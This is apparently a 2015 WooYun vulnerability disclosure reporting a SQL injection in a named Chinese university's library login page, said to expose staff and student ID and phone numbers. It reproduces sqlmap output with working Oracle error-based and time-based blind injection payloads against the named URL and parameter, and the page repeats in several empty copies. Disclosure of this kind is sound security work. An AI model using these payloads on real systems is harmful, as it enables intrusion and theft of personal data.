武汉市华中科技大学某处POSTSQL注入，泄露数万条师生信息，含身份证手机号

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092720

漏洞标题：武汉市华中科技大学某处POSTSQL注入，泄露数万条师生信息，含身份证手机号

漏洞作者：延迟熊猫

提交时间：2015-01-20 15:05

修复时间：2015-01-25 15:06

公开时间：2015-01-25 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-20：细节已通知厂商并且等待厂商处理中
2015-01-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

SQL注入嘛，就是影响大，

详细说明：

http://ilas.lib.hustwb.edu.cn/NTRdrLogin.aspx
图书馆某处登陆框，
PS ： URL里NTR挺应景的，本来不准备提交的（我不要被牛头人牛头人

漏洞证明：

---
Place: POST
Parameter: txtName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUJOTQ2ODIyODMwD2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUn5a 55LiN6LW377yM55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFCVJibnRSZWNubwUKUmJudENhcmRubwUKUmJudENhcmRubwUJUmJudEVtYWlsBQlSYm50RW1haWwFB1JibnRUZWwFB1JibnRUZWz3GJAF/ID6hFxM1AUmZgdhmCPDHA==&__EVENTVALIDATION=/wEWCAK3zdnADwLEhISFCwK1qbSWCwKxi8njCgLY78S0CwLJ8fnVDwLahr8QAuLjh4YMZt4383LPJg7KvPMkDGKSX/UN HA=&txtName=aaaaaaa' AND 9343=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(103)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9343=9343) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(102)||CHR(117)||CHR(113)||CHR(62))) FROM DUAL) AND 'ROQu'='ROQu&txtPassWord=aaaaaaaaaaa&Logintype=RbntRecno&BtnLogin=%E7%99%BB %E5%BD%95
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUJOTQ2ODIyODMwD2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUn5a 55LiN6LW377yM55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgcFCVJibnRSZWNubwUKUmJudENhcmRubwUKUmJudENhcmRubwUJUmJudEVtYWlsBQlSYm50RW1haWwFB1JibnRUZWwFB1JibnRUZWz3GJAF/ID6hFxM1AUmZgdhmCPDHA==&__EVENTVALIDATION=/wEWCAK3zdnADwLEhISFCwK1qbSWCwKxi8njCgLY78S0CwLJ8fnVDwLahr8QAuLjh4YMZt4383LPJg7KvPMkDGKSX/UN HA=&txtName=aaaaaaa' AND 4420=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(97)||CHR(112)||CHR(87),5) AND 'FSQy'='FSQy&txtPassWord=aaaaaaaaaaa&Logintype=RbntRecno&BtnLogin=%E7%99%BB %E5%BD%95
---

以上是SQLMAP结果
师生信息截图

修复方案：

设置过滤语句呗~
少偷懒，找的什么懒人，写的代码就喜欢偷工减料。

版权声明：转载请注明来源延迟熊猫@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-01-25 15:06

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092720

漏洞标题：武汉市华中科技大学某处POSTSQL注入，泄露数万条师生信息，含身份证手机号

相关厂商：武汉市华中科技大学

漏洞作者：延迟熊猫

提交时间：2015-01-20 15:05

修复时间：2015-01-25 15:06

公开时间：2015-01-25 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源延迟熊猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092720

漏洞标题：武汉市华中科技大学某处POSTSQL注入，泄露数万条师生信息，含身份证手机号

相关厂商：武汉市华中科技大学

漏洞作者： 延迟熊猫

提交时间：2015-01-20 15:05

修复时间：2015-01-25 15:06

公开时间：2015-01-25 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-092720"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 延迟熊猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：延迟熊猫

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源延迟熊猫@乌云